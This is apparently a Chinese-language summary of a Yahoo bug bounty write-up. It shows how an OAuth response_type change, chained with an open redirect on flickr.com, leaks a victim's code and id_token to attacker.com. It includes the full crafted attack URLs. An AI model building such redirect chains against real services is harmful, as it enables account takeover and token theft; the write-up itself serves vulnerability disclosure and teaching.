Exploiting OAuth Misconfiguration To Takeover Flickr Accounts

1. oAuth Login Flow

oAuth Endpoint:

https://api.login.yahoo.com/oauth2/request_auth?client_id=[client_ID]&redirect_uri=[URL]&response_type=code&scope=openid,sdpp-w&nonce=[my_nonce]&.scrumb=jeTYmScEVYq

当用户没Login的时候,该Endpoint会redirect user到以下地址:

// redirect URL
https://www.flickr.com/signin/yahoo/oauth/?redir=https://www.flickr.com/?ytcheck=1&new_session=1

当user Login后,server会返回一个code,然后redirect user到以下地址:

https://www.flickr.com/signin/yahoo/oauth/?redir=https://www.flickr.com/?ytcheck=1&new_session=1&code={redacted}

user会利用该code跟server交换一个accessToken.

2. Exploit

浏览文档,发现oAuth Endpoint除了接受code,还接受id_token.

https://api.login.yahoo.com/oauth2/request_auth?client_id=[client_ID]&redirect_uri=[URL]&response_type=code id_token&scope=openid,sdpp-w&nonce=[my_nonce]&.scrumb=jeTYmScEVYq

当用户访问上面的URL时,会被redirect到

https://www.flickr.com/signin/yahoo/oauth/?redir=https://www.flickr.com/?ytcheck=1&new_session=1#code={redacted}&id_token={redacted}

As you might know, the fragment part of the url (everything after #) is preserved when handling redirect responses from the server.

但是flickr只会在code正确的情况下,才会redirect 用户。我们需要构造一个合法的code. 明显我们可以使用自己的账号获得一个正确的code.

此外,该endpoint只会redirect user到https://www.flickr.com/*. 我们需要在flickr.com中查找另一个open redirect的漏洞,借此二次redirect到attack.com, 从而获取accessToken.

最后,作者在flickr的android app找到了open redirect漏洞。

https://www.flickr.com/sharing_connect.gne?service_type_id=9&token=a&callback_url=https:///google.com/

2.1 WrapUp

让用户访问以下URL

https://api.login.yahoo.com/oauth2/request_auth?client_id=[client_id]&redirect_uri=https://www.flickr.com/signin/yahoo/oauth/?code={here-is-the-attacker’s-code}&redir=https://www.flickr.com/sharing_connect.gne?service_type_id=9&token=a&callback_url=https:///attacker.com/&response_type=code id_token&scope=openid,sdpp-w&nonce=bb1c92e088f38e9c323fe025d42c405f&.scrumb=jeTYmScEVYq

用户Login后, 将被Redirect到

https://www.flickr.com/signin/yahoo/oauth/?code={here-is-the-attacker’s-code}&redir=https%3A%2F%2Fwww.flickr.com%2Fsharing_connect.gne%3Fservice_type_id%3D9%26token%3Da%26callback_url%3Dhttps%253A%252F%252F%252Fattacker.com%252F#code={victim’s-code}&id_token={victim’s-id_token}

由于{here-is-the-attacker's-code}是合法的,用户将被redirect到

https://www.flickr.com/sharing_connect.gne?service_type_id=9&token=a&callback_url=https:///attacker.com/#code={victim’s-code}&id_token={victim’s-id_token}

此时由于该处存在open redirect的漏洞,用户将再次被redirect到

https:///attacker.com/#code={victim’s-code}&id_token={victim’s-id_token}

Ref

Yahoo Bug Bounty: Exploiting OAuth Misconfiguration To Takeover Flickr Accounts – MISHRE

Show Comments